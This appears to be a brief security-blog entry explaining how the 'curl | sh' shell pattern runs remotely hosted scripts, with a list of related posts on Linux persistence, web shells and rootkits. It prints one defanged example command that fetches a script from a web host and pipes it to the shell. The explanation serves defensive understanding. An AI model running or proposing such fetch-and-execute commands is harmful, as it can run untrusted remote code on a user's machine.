curl | sh
0001-01-01
Software developers and malware often abuses the built-in functionality of the shell to execute data piped into it. Software, malicious or benign, may host installation scripts on a web server and install itself using curl to execute a script hosted remotely with a command like this:
curl hxxp://foo[.]net/installer.sh | sh
Linux Persistence: Modular Software
2025-04-17 DFIR CTF persistence linux persistence apache asterisk
Linux Persistence: Web Shells
2025-04-16 DFIR persistence webshell linux persistence webshell apache nginx PHP
Linux Persistence: Rootkits
2025-04-15 DFIR persistence rootkit LKM linux persistence LKM rootkit LD_PRELOAD kprobe ftrace ld.so hooking
Defanging Linux LKM Rootkits With cleanup_module()
2025-04-05 Linux LKM rootkits EDR hooks incident response Linux LKM rootkit